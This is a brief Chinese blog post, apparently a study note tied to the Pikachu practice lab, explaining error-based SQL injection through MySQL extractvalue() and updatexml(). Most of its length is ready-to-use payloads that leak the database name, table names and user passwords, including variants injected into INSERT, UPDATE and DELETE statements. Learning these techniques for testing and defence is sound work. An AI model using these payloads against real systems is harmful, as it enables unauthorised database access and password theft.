zoukankan      html  css  js  c++  java
  • extractvalue() 和 updatexml()报错注入

    extractvalue() 和 updatexml()报错注入

    使用基于函数的报错注入,函数会执行,并将结果返和错误信息一起返回

    使用concat将字符串拼接,防止错误信息显示不全

    ' and updatexml(1,concat('!',database()),1)#
    
    ' and extractvalue(1,concat('!',database()))#
    

    当结合查询语句是,使用括号,使用查询时只能包含一列字段结果只能有一行

    ' and updatexml(1,concat('!',(select table_name from information_schema.tables where table_schema='pikachu' limit 1)),1)#
    
    ' and extractvalue(1,concat('!',(select password from users limit 1)))#
    

    结合insert或update报错注入

    insert

    正常的SQL

    insert into users * values('zs','toor',1,119)
    

    使用payload'or extractvalue(1,concat('!',(select password from users limit 1)))or '

    insert into users * values('zs','or extractvalue(1,concat('!',(select password from users limit 1)))or ','','')
    

    update

    正常SQL

    update users set name='zsf', password='fsz' where name='zs'
    

    使用payload' or extractvalue(1,concat('!',(select password from users limit 1))) or '

    update users set name='zsf',password='' or extractvalue(1,concat('!',(select password from users limit 1))) or '' where name='zs'
    

    delete

    正常SQL

    delete from users where id = 1
    

    使用payloador extractvalue(1,concat('!',(select password from users limit 1)))

    delete from users where id = 1 or extractvalue(1,concat('!',(select password from users limit 1)))
    
  • 相关阅读:
    Beyond Compare 4 过期操作
    python2 批量转 python3
    【JavaScript】为什么javascript是单线程
    Java之花样玩枚举
    OpenSSL
    OpenSSL和OpenSSH以及私有CA的实现
    Python-线程同步
    Zookeeper基础
    pycharm中使用git以及多分支结构
    BZOJ 4771 主席树+倍增+set
  • 原文地址:https://www.cnblogs.com/kikochz/p/13676098.html
Copyright © 2011-2022 走看看